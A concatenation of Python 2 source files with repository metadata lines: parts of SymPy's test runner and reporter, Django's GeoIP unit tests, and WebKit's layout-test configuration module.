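# might be called on a documentation file. The path below is hypothetical.
def _example_sympytestfile():
    failed, attempted = sympytestfile(
        'doc/src/tutorial.txt', module_relative=False, encoding='utf-8',
        optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE)
    return failed == 0 and attempted > 0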
class SymPyTests(object):
def __init__(self, reporter, kw="", post_mortem=False,
seed=random.random()):
self._post_mortem = post_mortem
self._kw = kw
self._count = 0
self._root_dir = sympy_dir
self._reporter = reporter
self._reporter.root_dir(self._root_dir)
self._testfiles = []
self._seed = seed
def test(self, sort=False):
"""
Runs the tests returning True if all tests pass, otherwise False.
If sort=False run tests in random order.
"""
if sort:
self._testfiles.sort()
else:
from random import shuffle
random.seed(self._seed)
shuffle(self._testfiles)
self._reporter.start(self._seed)
for f in self._testfiles:
try:
self.test_file(f)
except KeyboardInterrupt:
print " interrupted by user"
break
return self._reporter.finish()
def test_file(self, filename):
name = "test%d" % self._count
name = os.path.splitext(os.path.basename(filename))[0]
self._count += 1
gl = {'__file__':filename}
random.seed(self._seed)
try:
execfile(filename, gl)
except (ImportError, SyntaxError):
self._reporter.import_error(filename, sys.exc_info())
return
pytestfile = ""
if "XFAIL" in gl:
pytestfile = inspect.getsourcefile(gl["XFAIL"])
disabled = gl.get("disabled", False)
if disabled:
funcs = []
else:
            # we need to filter only those functions that begin with 'test_'
            # that are defined in the testing file or in the file where
            # the XFAIL decorator is defined
funcs = [gl[f] for f in gl.keys() if f.startswith("test_") and
(inspect.isfunction(gl[f])
or inspect.ismethod(gl[f])) and
(inspect.getsourcefile(gl[f]) == filename or
inspect.getsourcefile(gl[f]) == pytestfile)]
# Sorting of XFAILed functions isn't fixed yet :-(
funcs.sort(key=lambda x: inspect.getsourcelines(x)[1])
i = 0
while i < len(funcs):
if isgeneratorfunction(funcs[i]):
# some tests can be generators, that return the actual
# test functions. We unpack it below:
f = funcs.pop(i)
for fg in f():
func = fg[0]
args = fg[1:]
fgw = lambda: func(*args)
funcs.insert(i, fgw)
i += 1
else:
i += 1
# drop functions that are not selected with the keyword expression:
funcs = [x for x in funcs if self.matches(x)]
if not funcs:
return
self._reporter.entering_filename(filename, len(funcs))
for f in funcs:
self._reporter.entering_test(f)
try:
f()
except KeyboardInterrupt:
raise
except:
t, v, tr = sys.exc_info()
if t is AssertionError:
self._reporter.test_fail((t, v, tr))
if self._post_mortem:
pdb.post_mortem(tr)
elif t.__name__ == "Skipped":
self._reporter.test_skip(v)
elif t.__name__ == "XFail":
self._reporter.test_xfail()
elif t.__name__ == "XPass":
self._reporter.test_xpass(v)
else:
self._reporter.test_exception((t, v, tr))
if self._post_mortem:
pdb.post_mortem(tr)
else:
self._reporter.test_pass()
self._reporter.leaving_filename()
def matches(self, x):
"""
Does the keyword expression self._kw match "x"? Returns True/False.
Always returns True if self._kw is "".
"""
if self._kw == "":
return True
return x.__name__.find(self._kw) != -1
def get_test_files(self, dir, pat = 'test_*.py'):
"""
Returns the list of test_*.py (default) files at or below directory
`dir` relative to the sympy home directory.
"""
dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0])
g = []
for path, folders, files in os.walk(dir):
g.extend([os.path.join(path, f) for f in files if fnmatch(f, pat)])
return [sys_normcase(gi) for gi in g]
class SymPyDocTests(object):
def __init__(self, reporter, normal):
self._count = 0
self._root_dir = sympy_dir
self._reporter = reporter
self._reporter.root_dir(self._root_dir)
self._normal = normal
self._testfiles = []
def test(self):
"""
Runs the tests and returns True if all tests pass, otherwise False.
"""
self._reporter.start()
for f in self._testfiles:
try:
self.test_file(f)
except KeyboardInterrupt:
print " interrupted by user"
break
return self._reporter.finish()
def test_file(self, filename):
import unittest
from StringIO import StringIO
rel_name = filename[len(self._root_dir)+1:]
module = rel_name.replace(os.sep, '.')[:-3]
setup_pprint()
try:
module = pdoctest._normalize_module(module)
tests = SymPyDocTestFinder().find(module)
except:
self._reporter.import_error(filename, sys.exc_info())
return
tests = [test for test in tests if len(test.examples) > 0]
# By default (except for python 2.4 in which it was broken) tests
        # are sorted in alphabetical order by function name. We sort by line number
# so one can edit the file sequentially from bottom to top...HOWEVER
# if there are decorated functions, their line numbers will be too large
# and for now one must just search for these by text and function name.
tests.sort(key=lambda x: -x.lineno)
if not tests:
return
self._reporter.entering_filename(filename, len(tests))
for test in tests:
assert len(test.examples) != 0
runner = SymPyDocTestRunner(optionflags=pdoctest.ELLIPSIS | \
pdoctest.NORMALIZE_WHITESPACE)
old = sys.stdout
new = StringIO()
sys.stdout = new
# If the testing is normal, the doctests get importing magic to
            # provide the global namespace. If not normal (the default) then
            # they must run on their own; all imports must be explicit within
# a function's docstring. Once imported that import will be
# available to the rest of the tests in a given function's
# docstring (unless clear_globs=True below).
if not self._normal:
test.globs = {}
                # if this is uncommented then all that the test would get is what
# comes by default with a "from sympy import *"
#exec('from sympy import *') in test.globs
try:
f, t = runner.run(test, out=new.write, clear_globs=False)
finally:
sys.stdout = old
if f > 0:
self._reporter.doctest_fail(test.name, new.getvalue())
else:
self._reporter.test_pass()
self._reporter.leaving_filename()
def get_test_files(self, dir, pat='*.py', init_only=True):
"""
Returns the list of *py files (default) from which docstrings
will be tested which are at or below directory `dir`. By default,
only those that have an __init__.py in their parent directory
and do not start with `test_` will be included.
"""
def importable(x):
"""
Checks if given pathname x is an importable module by checking for
__init__.py file.
Returns True/False.
Currently we only test if the __init__.py file exists in the
directory with the file "x" (in theory we should also test all the
parent dirs).
"""
init_py = os.path.join(os.path.dirname(x), "__init__.py")
return os.path.exists(init_py)
dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0])
g = []
for path, folders, files in os.walk(dir):
g.extend([os.path.join(path, f) for f in files
if not f.startswith('test_') and fnmatch(f, pat)])
if init_only:
# skip files that are not importable (i.e. missing __init__.py)
g = [x for x in g if importable(x)]
return [sys_normcase(gi) for gi in g]
class SymPyDocTestFinder(DocTestFinder):
"""
A class used to extract the DocTests that are relevant to a given
object, from its docstring and the docstrings of its contained
objects. Doctests can currently be extracted from the following
object types: modules, functions, classes, methods, staticmethods,
classmethods, and properties.
Modified from doctest's version by looking harder for code in the
    case that it looks like the code comes from a different module.
In the case of decorated functions (e.g. @vectorize) they appear
    to come from a different module (e.g. multidimensional) even though
their code is not there.
"""
def _find(self, tests, obj, name, module, source_lines, globs, seen):
"""
Find tests for the given object and any contained objects, and
add them to `tests`.
"""
if self._verbose:
print 'Finding tests in %s' % name
# If we've already processed this object, then ignore it.
if id(obj) in seen:
return
seen[id(obj)] = 1
# Make sure we don't run doctests for classes outside of sympy, such
# as in numpy or scipy.
if inspect.isclass(obj):
if obj.__module__.split('.')[0] != 'sympy':
return
# Find a test for this object, and add it to the list of tests.
test = self._get_test(obj, name, module, globs, source_lines)
if test is not None:
tests.append(test)
# Look for tests in a module's contained objects.
if inspect.ismodule(obj) and self._recurse:
for rawname, val in obj.__dict__.items():
# Recurse to functions & classes.
if inspect.isfunction(val) or inspect.isclass(val):
in_module = self._from_module(module, val)
if not in_module:
# double check in case this function is decorated
# and just appears to come from a different module.
pat = r'\s*(def|class)\s+%s\s*\(' % rawname
PAT = pre.compile(pat)
in_module = any(PAT.match(line) for line in source_lines)
if in_module:
try:
valname = '%s.%s' % (name, rawname)
self._find(tests, val, valname, module, source_lines, globs, seen)
except ValueError, msg:
raise
except:
pass
# Look for tests in a module's __test__ dictionary.
if inspect.ismodule(obj) and self._recurse:
for valname, val in getattr(obj, '__test__', {}).items():
if not isinstance(valname, basestring):
raise ValueError("SymPyDocTestFinder.find: __test__ keys "
"must be strings: %r" %
(type(valname),))
if not (inspect.isfunction(val) or inspect.isclass(val) or
inspect.ismethod(val) or inspect.ismodule(val) or
isinstance(val, basestring)):
raise ValueError("SymPyDocTestFinder.find: __test__ values "
"must be strings, functions, methods, "
"classes, or modules: %r" %
(type(val),))
valname = '%s.__test__.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
# Look for tests in a class's contained objects.
if inspect.isclass(obj) and self._recurse:
for valname, val in obj.__dict__.items():
# Special handling for staticmethod/classmethod.
if isinstance(val, staticmethod):
val = getattr(obj, valname)
if isinstance(val, classmethod):
val = getattr(obj, valname).im_func
# Recurse to methods, properties, and nested classes.
if (inspect.isfunction(val) or
inspect.isclass(val) or
isinstance(val, property)):
in_module = self._from_module(module, val)
if not in_module:
# "double check" again
pat = r'\s*(def|class)\s+%s\s*\(' % valname
PAT = pre.compile(pat)
in_module = any(PAT.match(line) for line in source_lines)
if in_module:
valname = '%s.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
def _get_test(self, obj, name, module, globs, source_lines):
"""
Return a DocTest for the given object, if it defines a docstring;
otherwise, return None.
"""
# Extract the object's docstring. If it doesn't have one,
# then return None (no test for this object).
if isinstance(obj, basestring):
docstring = obj
else:
try:
if obj.__doc__ is None:
docstring = ''
else:
docstring = obj.__doc__
if not isinstance(docstring, basestring):
docstring = str(docstring)
except (TypeError, AttributeError):
docstring = ''
# Find the docstring's location in the file.
lineno = self._find_lineno(obj, source_lines)
if lineno is None:
# if None, then _find_lineno couldn't find the docstring.
# But IT IS STILL THERE. Likely it was decorated or something
# (i.e., @property docstrings have lineno == None)
# TODO: Write our own _find_lineno that is smarter in this regard
# Until then, just give it a dummy lineno. This is just used for
# sorting the tests, so the only bad effect is that they will appear
# last instead of the order that they really are in the file.
# lineno is also used to report the offending line of a failing
# doctest, which is another reason to fix this. See issue 1947.
lineno = 0
# Don't bother if the docstring is empty.
if self._exclude_empty and not docstring:
return None
# Return a DocTest for this object.
if module is None:
filename = None
else:
filename = getattr(module, '__file__', module.__name__)
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
return self._parser.get_doctest(docstring, globs, name,
filename, lineno)
class SymPyDocTestRunner(DocTestRunner):
"""
A class used to run DocTest test cases, and accumulate statistics.
The `run` method is used to process a single DocTest case. It
returns a tuple `(f, t)`, where `t` is the number of test cases
tried, and `f` is the number of test cases that failed.
Modified from the doctest version to not reset the sys.displayhook (see
issue 2041).
See the docstring of the original DocTestRunner for more information.
"""
def run(self, test, compileflags=None, out=None, clear_globs=True):
"""
Run the examples in `test`, and display the results using the
writer function `out`.
The examples are run in the namespace `test.globs`. If
`clear_globs` is true (the default), then this namespace will
be cleared after the test runs, to help with garbage
collection. If you would like to examine the namespace after
the test completes, then use `clear_globs=False`.
`compileflags` gives the set of flags that should be used by
the Python compiler when running the examples. If not
specified, then it will default to the set of future-import
flags that apply to `globs`.
The output of each example is checked using
`SymPyDocTestRunner.check_output`, and the results are formatted by
the `SymPyDocTestRunner.report_*` methods.
"""
self.test = test
if compileflags is None:
compileflags = pdoctest._extract_future_flags(test.globs)
save_stdout = sys.stdout
if out is None:
out = save_stdout.write
sys.stdout = self._fakeout
# Patch pdb.set_trace to restore sys.stdout during interactive
# debugging (so it's not still redirected to self._fakeout).
# Note that the interactive output will go to *our*
# save_stdout, even if that's not the real sys.stdout; this
# allows us to write test cases for the set_trace behavior.
save_set_trace = pdb.set_trace
self.debugger = pdoctest._OutputRedirectingPdb(save_stdout)
self.debugger.reset()
pdb.set_trace = self.debugger.set_trace
# Patch linecache.getlines, so we can see the example's source
# when we're inside the debugger.
self.save_linecache_getlines = pdoctest.linecache.getlines
linecache.getlines = self.__patched_linecache_getlines
try:
return self.__run(test, compileflags, out)
finally:
sys.stdout = save_stdout
pdb.set_trace = save_set_trace
linecache.getlines = self.save_linecache_getlines
if clear_globs:
test.globs.clear()
# We have to override the name mangled methods.
SymPyDocTestRunner._SymPyDocTestRunner__patched_linecache_getlines = \
DocTestRunner._DocTestRunner__patched_linecache_getlines
SymPyDocTestRunner._SymPyDocTestRunner__run = DocTestRunner._DocTestRunner__run
SymPyDocTestRunner._SymPyDocTestRunner__record_outcome = \
DocTestRunner._DocTestRunner__record_outcome
class Reporter(object):
"""
Parent class for all reporters.
"""
pass
class PyTestReporter(Reporter):
"""
Py.test like reporter. Should produce output identical to py.test.
"""
def __init__(self, verbose=False, tb="short", colors=True):
self._verbose = verbose
self._tb_style = tb
self._colors = colors
self._xfailed = 0
self._xpassed = []
self._failed = []
self._failed_doctest = []
self._passed = 0
self._skipped = 0
self._exceptions = []
# this tracks the x-position of the cursor (useful for positioning
# things on the screen), without the need for any readline library:
self._write_pos = 0
self._line_wrap = False
def root_dir(self, dir):
self._root_dir = dir
def write(self, text, color="", align="left", width=80):
"""
Prints a text on the screen.
It uses sys.stdout.write(), so no readline library is necessary.
color ... choose from the colors below, "" means default color
align ... left/right, left is a normal print, right is aligned on the
right hand side of the screen, filled with " " if necessary
width ... the screen width
"""
color_templates = (
("Black" , "0;30"),
("Red" , "0;31"),
("Green" , "0;32"),
("Brown" , "0;33"),
("Blue" , "0;34"),
("Purple" , "0;35"),
("Cyan" , "0;36"),
("LightGray" , "0;37"),
("DarkGray" , "1;30"),
("LightRed" , "1;31"),
("LightGreen" , "1;32"),
("Yellow" , "1;33"),
("LightBlue" , "1;34"),
("LightPurple" , "1;35"),
("LightCyan" , "1;36"),
("White" , "1;37"), )
colors = {}
for name, value in color_templates:
colors[name] = value
c_normal = '\033[0m'
c_color = '\033[%sm'
if align == "right":
if self._write_pos+len(text) > width:
# we don't fit on the current line, create a new line
self.write("\n")
self.write(" "*(width-self._write_pos-len(text)))
if hasattr(sys.stdout, 'isatty') and not sys.stdout.isatty():
# the stdout is not a terminal, this for example happens if the
# output is piped to less, e.g. "bin/test | less". In this case,
# the terminal control sequences would be printed verbatim, so
# don't use any colors.
color = ""
if sys.platform == "win32":
# Windows consoles don't support ANSI escape sequences
color = ""
if self._line_wrap:
if text[0] != "\n":
sys.stdout.write("\n")
if color == "":
sys.stdout.write(text)
else:
sys.stdout.write("%s%s%s" % (c_color % colors[color], text, c_normal))
sys.stdout.flush()
l = text.rfind("\n")
if l == -1:
self._write_pos += len(text)
else:
self._write_pos = len(text)-l-1
self._line_wrap = self._write_pos >= width
self._write_pos %= width
def write_center(self, text, delim="="):
width = 80
if text != "":
text = " %s " % text
idx = (width-len(text)) // 2
t = delim*idx + text + delim*(width-idx-len(text))
self.write(t+"\n")
def write_exception(self, e, val, tb):
t = traceback.extract_tb(tb)
# remove the first item, as that is always runtests.py
t = t[1:]
t = traceback.format_list(t)
self.write("".join(t))
t = traceback.format_exception_only(e, val)
self.write("".join(t))
def start(self, seed=None):
self.write_center("test process starts")
executable = sys.executable
v = tuple(sys.version_info)
python_version = "%s.%s.%s-%s-%s" % v
self.write("executable: %s (%s)\n" % (executable, python_version))
from .misc import ARCH
self.write("architecture: %s\n" % ARCH)
from sympy.polys.domains import GROUND_TYPES
self.write("ground types: %s\n" % GROUND_TYPES)
if seed is not None:
self.write("random seed: %d\n\n" % seed)
self._t_start = clock()
def finish(self):
self._t_end = clock()
self.write("\n")
global text, linelen
text = "tests finished: %d passed, " % self._passed
linelen = len(text)
def add_text(mytext):
global text, linelen
"""Break new text if too long."""
if linelen + len(mytext) > 80:
text += '\n'
linelen = 0
text += mytext
linelen += len(mytext)
if len(self._failed) > 0:
add_text("%d failed, " % len(self._failed))
if len(self._failed_doctest) > 0:
add_text("%d failed, " % len(self._failed_doctest))
if self._skipped > 0:
add_text("%d skipped, " % self._skipped)
if self._xfailed > 0:
add_text("%d expected to fail, " % self._xfailed)
if len(self._xpassed) > 0:
add_text("%d expected to fail but passed, " % len(self._xpassed))
if len(self._exceptions) > 0:
add_text("%d exceptions, " % len(self._exceptions))
add_text("in %.2f seconds" % (self._t_end - self._t_start))
if len(self._xpassed) > 0:
self.write_center("xpassed tests", "_")
for e in self._xpassed:
self.write("%s:%s\n" % (e[0], e[1]))
self.write("\n")
if self._tb_style != "no" and len(self._exceptions) > 0:
#self.write_center("These tests raised an exception", "_")
for e in self._exceptions:
filename, f, (t, val, tb) = e
self.write_center("", "_")
if f is None:
s = "%s" % filename
else:
s = "%s:%s" % (filename, f.__name__)
self.write_center(s, "_")
self.write_exception(t, val, tb)
self.write("\n")
if self._tb_style != "no" and len(self._failed) > 0:
#self.write_center("Failed", "_")
for e in self._failed:
filename, f, (t, val, tb) = e
self.write_center("", "_")
self.write_center("%s:%s" % (filename, f.__name__), "_")
self.write_exception(t, val, tb)
self.write("\n")
if self._tb_style != "no" and len(self._failed_doctest) > 0:
#self.write_center("Failed", "_")
for e in self._failed_doctest:
filename, msg = e
self.write_center("", "_")
self.write_center("%s" % filename, "_")
self.write(msg)
self.write("\n")
self.write_center(text)
ok = len(self._failed) == 0 and len(self._exceptions) == 0 and \
len(self._failed_doctest) == 0
if not ok:
self.write("DO *NOT* COMMIT!\n")
return ok
def entering_filename(self, filename, n):
rel_name = filename[len(self._root_dir)+1:]
self._active_file = rel_name
self._active_file_error = False
self.write(rel_name)
self.write("[%d] " % n)
def leaving_filename(self):
if self._colors:
self.write(" ")
if self._active_file_error:
self.write("[FAIL]", "Red", align="right")
else:
self.write("[OK]", "Green", align="right")
self.write("\n")
if self._verbose:
self.write("\n")
def entering_test(self, f):
self._active_f = f
if self._verbose:
self.write("\n"+f.__name__+" ")
def test_xfail(self):
self._xfailed += 1
self.write("f", "Green")
def test_xpass(self, fname):
self._xpassed.append((self._active_file, fname))
self.write("X", "Green")
def test_fail(self, exc_info):
self._failed.append((self._active_file, self._active_f, exc_info))
self.write("F", "Red")
self._active_file_error = True
def doctest_fail(self, name, error_msg):
# the first line contains "******", remove it:
error_msg = "\n".join(error_msg.split("\n")[1:])
self._failed_doctest.append((name, error_msg))
self.write("F", "Red")
self._active_file_error = True
def test_pass(self):
self._passed += 1
if self._verbose:
self.write("ok", "Green")
else:
self.write(".", "Green")
def test_skip(self, v):
self._skipped += 1
self.write("s", "Green")
if self._verbose:
self.write(" - ", "Green")
self.write(v.message, "Green")
def test_exception(self, exc_info):
self._exceptions.append((self._active_file, self._active_f, exc_info))
self.write("E", "Red")
self._active_file_error = True
def import_error(self, filename, exc_info):
self._exceptions.append((filename, None, exc_info))
rel_name = filename[len(self._root_dir)+1:]
self.write(rel_name)
self.write("[?] Failed to import", "Red")
if self._colors:
self.write(" ")
self.write("[FAIL]", "Red", align="right")
self.write("\n")
sympy_dir = get_sympy_dir()
| agpl-3.0 | 7,366,864,913,316,608,000 | 36.926048 | 95 | 0.562332 | false |
tjsavage/sfcsdatabase | django/contrib/gis/tests/test_geoip.py | 290 | 4204 | import os, unittest
from django.db import settings
from django.contrib.gis.geos import GEOSGeometry
from django.contrib.gis.utils import GeoIP, GeoIPException
# Note: Requires use of both the GeoIP country and city datasets.
# The GEOIP_PATH setting should be the only setting set (the directory
# should contain links or the actual database files 'GeoIP.dat' and
# 'GeoLiteCity.dat').
class GeoIPTest(unittest.TestCase):
def test01_init(self):
"Testing GeoIP initialization."
g1 = GeoIP() # Everything inferred from GeoIP path
path = settings.GEOIP_PATH
g2 = GeoIP(path, 0) # Passing in data path explicitly.
g3 = GeoIP.open(path, 0) # MaxMind Python API syntax.
for g in (g1, g2, g3):
self.assertEqual(True, bool(g._country))
self.assertEqual(True, bool(g._city))
# Only passing in the location of one database.
city = os.path.join(path, 'GeoLiteCity.dat')
cntry = os.path.join(path, 'GeoIP.dat')
g4 = GeoIP(city, country='')
self.assertEqual(None, g4._country)
g5 = GeoIP(cntry, city='')
self.assertEqual(None, g5._city)
# Improper parameters.
bad_params = (23, 'foo', 15.23)
for bad in bad_params:
self.assertRaises(GeoIPException, GeoIP, cache=bad)
if isinstance(bad, basestring):
e = GeoIPException
else:
e = TypeError
self.assertRaises(e, GeoIP, bad, 0)
def test02_bad_query(self):
"Testing GeoIP query parameter checking."
cntry_g = GeoIP(city='<foo>')
# No city database available, these calls should fail.
self.assertRaises(GeoIPException, cntry_g.city, 'google.com')
self.assertRaises(GeoIPException, cntry_g.coords, 'yahoo.com')
# Non-string query should raise TypeError
self.assertRaises(TypeError, cntry_g.country_code, 17)
self.assertRaises(TypeError, cntry_g.country_name, GeoIP)
def test03_country(self):
"Testing GeoIP country querying methods."
g = GeoIP(city='<foo>')
fqdn = 'www.google.com'
addr = '12.215.42.19'
for query in (fqdn, addr):
for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
self.assertEqual('US', func(query))
for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
self.assertEqual('United States', func(query))
self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
g.country(query))
def test04_city(self):
"Testing GeoIP city querying methods."
g = GeoIP(country='<foo>')
addr = '130.80.29.3'
fqdn = 'chron.com'
for query in (fqdn, addr):
# Country queries should still work.
for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
self.assertEqual('US', func(query))
for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
self.assertEqual('United States', func(query))
self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
g.country(query))
# City information dictionary.
d = g.city(query)
self.assertEqual('USA', d['country_code3'])
self.assertEqual('Houston', d['city'])
self.assertEqual('TX', d['region'])
self.assertEqual(713, d['area_code'])
geom = g.geos(query)
self.failIf(not isinstance(geom, GEOSGeometry))
lon, lat = (-95.3670, 29.7523)
lat_lon = g.lat_lon(query)
lat_lon = (lat_lon[1], lat_lon[0])
for tup in (geom.tuple, g.coords(query), g.lon_lat(query), lat_lon):
self.assertAlmostEqual(lon, tup[0], 4)
self.assertAlmostEqual(lat, tup[1], 4)
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GeoIPTest))
return s
def run(verbosity=2):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| bsd-3-clause | 8,780,992,160,874,227,000 | 39.815534 | 89 | 0.595385 | false |
dparshin/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/layout_tests/models/test_configuration.py | 126 | 13672 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class TestConfiguration(object):
def __init__(self, version, architecture, build_type):
self.version = version
self.architecture = architecture
self.build_type = build_type
@classmethod
def category_order(cls):
"""The most common human-readable order in which the configuration properties are listed."""
return ['version', 'architecture', 'build_type']
def items(self):
return self.__dict__.items()
def keys(self):
return self.__dict__.keys()
def __str__(self):
return ("<%(version)s, %(architecture)s, %(build_type)s>" %
self.__dict__)
def __repr__(self):
return "TestConfig(version='%(version)s', architecture='%(architecture)s', build_type='%(build_type)s')" % self.__dict__
def __hash__(self):
return hash(self.version + self.architecture + self.build_type)
def __eq__(self, other):
return self.__hash__() == other.__hash__()
def values(self):
"""Returns the configuration values of this instance as a tuple."""
return self.__dict__.values()
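# Illustrative sketch, not part of the original module: constructing and
# comparing TestConfiguration instances. The specifier values are hypothetical.
def _example_test_configuration():
    config_a = TestConfiguration('win7', 'x86', 'release')
    config_b = TestConfiguration('win7', 'x86', 'release')
    assert config_a == config_b  # equality and hashing use all three values
    return str(config_a)         # "<win7, x86, release>"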
class SpecifierSorter(object):
def __init__(self, all_test_configurations=None, macros=None):
self._specifier_to_category = {}
if not all_test_configurations:
return
for test_configuration in all_test_configurations:
for category, specifier in test_configuration.items():
self.add_specifier(category, specifier)
self.add_macros(macros)
def add_specifier(self, category, specifier):
self._specifier_to_category[specifier] = category
def add_macros(self, macros):
if not macros:
return
# Assume well-formed macros.
for macro, specifier_list in macros.items():
self.add_specifier(self.category_for_specifier(specifier_list[0]), macro)
@classmethod
def category_priority(cls, category):
return TestConfiguration.category_order().index(category)
def specifier_priority(self, specifier):
return self.category_priority(self._specifier_to_category[specifier])
def category_for_specifier(self, specifier):
return self._specifier_to_category.get(specifier)
def sort_specifiers(self, specifiers):
category_slots = map(lambda x: [], TestConfiguration.category_order())
for specifier in specifiers:
category_slots[self.specifier_priority(specifier)].append(specifier)
def sort_and_return(result, specifier_list):
specifier_list.sort()
return result + specifier_list
return reduce(sort_and_return, category_slots, [])
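# Illustrative sketch, not part of the original module: sorting specifiers by
# category with SpecifierSorter. The specifier names are hypothetical.
def _example_specifier_sorter():
    sorter = SpecifierSorter()
    sorter.add_specifier('version', 'xp')
    sorter.add_specifier('architecture', 'x86')
    sorter.add_specifier('build_type', 'release')
    # Expected order follows TestConfiguration.category_order():
    # ['xp', 'x86', 'release']
    return sorter.sort_specifiers(['release', 'xp', 'x86'])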
class TestConfigurationConverter(object):
def __init__(self, all_test_configurations, configuration_macros=None):
self._all_test_configurations = all_test_configurations
self._configuration_macros = configuration_macros or {}
self._specifier_to_configuration_set = {}
self._specifier_sorter = SpecifierSorter()
self._collapsing_sets_by_size = {}
self._junk_specifier_combinations = {}
self._collapsing_sets_by_category = {}
matching_sets_by_category = {}
for configuration in all_test_configurations:
for category, specifier in configuration.items():
self._specifier_to_configuration_set.setdefault(specifier, set()).add(configuration)
self._specifier_sorter.add_specifier(category, specifier)
self._collapsing_sets_by_category.setdefault(category, set()).add(specifier)
# FIXME: This seems extra-awful.
for cat2, spec2 in configuration.items():
if category == cat2:
continue
matching_sets_by_category.setdefault(specifier, {}).setdefault(cat2, set()).add(spec2)
for collapsing_set in self._collapsing_sets_by_category.values():
self._collapsing_sets_by_size.setdefault(len(collapsing_set), set()).add(frozenset(collapsing_set))
for specifier, sets_by_category in matching_sets_by_category.items():
for category, set_by_category in sets_by_category.items():
if len(set_by_category) == 1 and self._specifier_sorter.category_priority(category) > self._specifier_sorter.specifier_priority(specifier):
self._junk_specifier_combinations[specifier] = set_by_category
self._specifier_sorter.add_macros(configuration_macros)
def specifier_sorter(self):
return self._specifier_sorter
def _expand_macros(self, specifier):
expanded_specifiers = self._configuration_macros.get(specifier)
return expanded_specifiers or [specifier]
def to_config_set(self, specifier_set, error_list=None):
"""Convert a list of specifiers into a set of TestConfiguration instances."""
if len(specifier_set) == 0:
return self._all_test_configurations
matching_sets = {}
for specifier in specifier_set:
for expanded_specifier in self._expand_macros(specifier):
configurations = self._specifier_to_configuration_set.get(expanded_specifier)
if not configurations:
if error_list is not None:
error_list.append("Unrecognized modifier '" + expanded_specifier + "'")
return set()
category = self._specifier_sorter.category_for_specifier(expanded_specifier)
matching_sets.setdefault(category, set()).update(configurations)
return reduce(set.intersection, matching_sets.values())
@classmethod
def collapse_macros(cls, macros_dict, specifiers_list):
for macro_specifier, macro in macros_dict.items():
if len(macro) == 1:
continue
for combination in cls.combinations(specifiers_list, len(macro)):
if cls.symmetric_difference(combination) == set(macro):
for item in combination:
specifiers_list.remove(item)
new_specifier_set = cls.intersect_combination(combination)
new_specifier_set.add(macro_specifier)
specifiers_list.append(frozenset(new_specifier_set))
def collapse_individual_specifier_set(macro_specifier, macro):
specifiers_to_remove = []
specifiers_to_add = []
for specifier_set in specifiers_list:
macro_set = set(macro)
if macro_set.intersection(specifier_set) == macro_set:
specifiers_to_remove.append(specifier_set)
specifiers_to_add.append(frozenset((set(specifier_set) - macro_set) | set([macro_specifier])))
for specifier in specifiers_to_remove:
specifiers_list.remove(specifier)
for specifier in specifiers_to_add:
specifiers_list.append(specifier)
for macro_specifier, macro in macros_dict.items():
collapse_individual_specifier_set(macro_specifier, macro)
    # FIXME: itertools.combinations is buggy in Python 2.6.1 (the version that ships on SL).
# It seems to be okay in 2.6.5 or later; until then, this is the implementation given
# in http://docs.python.org/library/itertools.html (from 2.7).
@staticmethod
def combinations(iterable, r):
# combinations('ABCD', 2) --> AB AC AD BC BD CD
# combinations(range(4), 3) --> 012 013 023 123
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = range(r)
yield tuple(pool[i] for i in indices)
while True:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1 # pylint: disable=W0631
for j in range(i + 1, r): # pylint: disable=W0631
indices[j] = indices[j - 1] + 1
yield tuple(pool[i] for i in indices)
@classmethod
def intersect_combination(cls, combination):
return reduce(set.intersection, [set(specifiers) for specifiers in combination])
@classmethod
def symmetric_difference(cls, iterable):
union = set()
intersection = iterable[0]
for item in iterable:
union = union | item
intersection = intersection.intersection(item)
return union - intersection
def to_specifiers_list(self, test_configuration_set):
"""Convert a set of TestConfiguration instances into one or more list of specifiers."""
# Easy out: if the set is all configurations, the modifier is empty.
if len(test_configuration_set) == len(self._all_test_configurations):
return [[]]
# 1) Build a list of specifier sets, discarding specifiers that don't add value.
specifiers_list = []
for config in test_configuration_set:
values = set(config.values())
for specifier, junk_specifier_set in self._junk_specifier_combinations.items():
if specifier in values:
values -= junk_specifier_set
specifiers_list.append(frozenset(values))
